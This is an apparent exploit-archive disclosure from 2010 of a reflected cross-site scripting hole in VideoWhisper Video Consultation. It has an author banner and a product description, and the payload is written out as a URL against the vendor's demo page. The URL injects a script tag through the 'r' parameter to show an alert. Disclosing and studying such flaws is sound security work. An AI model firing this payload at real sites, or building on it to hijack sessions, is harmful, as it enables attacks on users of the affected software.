VideoWhisper Video Consultation Xss Vulnerabilities

2010-06-27T00:00:00
ID 1337DAY-ID-12990
Type zdt
Reporter Cur53D
Modified 2010-06-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
VideoWhisper Video Consultation Xss Vulnerabilities 
===================================================


To accomplish great things, we must dream as well as act
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=

AUTHOR          : Cur53D
MAIL            : [email protected]
DATE            : 27,june 2010
Blog            : www.Cur53D.dlstreet.net
Type            : XSS
Greetz          : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T And All My Friends


####################################################################################
About The Script:

VideoWhisper Video Consultation is a premium high definition video communication

software designed for online video consultations, interactive live presentations,

trainings, webinars, coaching? and online collaboration.

It was designed for few to many 2 way moderated video communication. Moderators

control what participant is displayed on main screen (speaker) and can also add an

additional participant (inquirer) to ask questions or assist. Participants can

change their public status (i.e. request to speak), upload and download room files,

text and video chat.

########################################################
This vulnerability affects /consultation/index.php

LIVE DEMO :
####################################################################################

http://www.videowhisper.com/demos/consultation/index.php?r=%3E%22%3E%3CScRiPt%20%

0A%0D%3Ealert%28404944702436%29%3B%3C/ScRiPt%3E.

####################################################################################
#Cur53D



#  0day.today [2018-01-02]  #